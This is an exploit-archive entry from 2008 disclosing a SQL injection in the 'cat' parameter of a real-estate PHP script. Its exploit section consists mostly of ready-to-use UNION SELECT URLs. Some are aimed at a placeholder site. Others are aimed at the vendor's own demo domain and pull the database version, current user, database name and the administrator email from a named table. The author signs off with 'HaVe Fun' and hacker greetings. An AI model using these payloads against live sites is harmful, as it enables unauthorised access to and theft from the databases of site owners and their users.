|
|
| Details : ExploitAlert |
|
|
Topic : | Real Estate Scripts 2008 (index.php cat) SQL Injection Vulnerability
|
ExploitAlert : 4918
Milw0rm ID : 6736
Credit : EgY Coders TM
Date : 16.10.2008
Download
 Exploit Code : ###########################################################################
####################
# Author : EgY Coders TM < Hakxer>
# Home : Www.educ-up.com
# Type Gap : SQL INJECTION
# script : Real-Estate-Scripts [see script]
http://www.real-estate-scripts.com/demo.html
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r ,
Stealth , Kof2002 ,Bright D@rk
###########################################################################
######################
####### [+] Bug in : index.php
### POC
http://www.site.com/real-estate/index.php?cat=-5+UNION+SELECT+@@version,2,3
/*
http://www.site.com/real-estate/index.php?cat=-5+UNION+SELECT+user(),2,3/*
### Exploit
[+] Get User
# [+]
http://www.real-estate-scripts.com/real-estate/index.php?cat=-5+UNION+SELEC
T+admin_email,2,3+from+ovi_anuntgratis.class_settings/*
[+] Get Database Name
# [+]
http://www.real-estate-scripts.com/real-estate/index.php?cat=-5+UNION+SELEC
T+database(),2,3/*
# [+] HaVe Fun .. ;
###########################################################################
####
-------------------------------- The End of Gap
-----------------------------------
## Contact : aq5@windowslive.com
### Muslim Hacker .. I love you Mohammed Rasull Allah
######################################################
|
|
|
|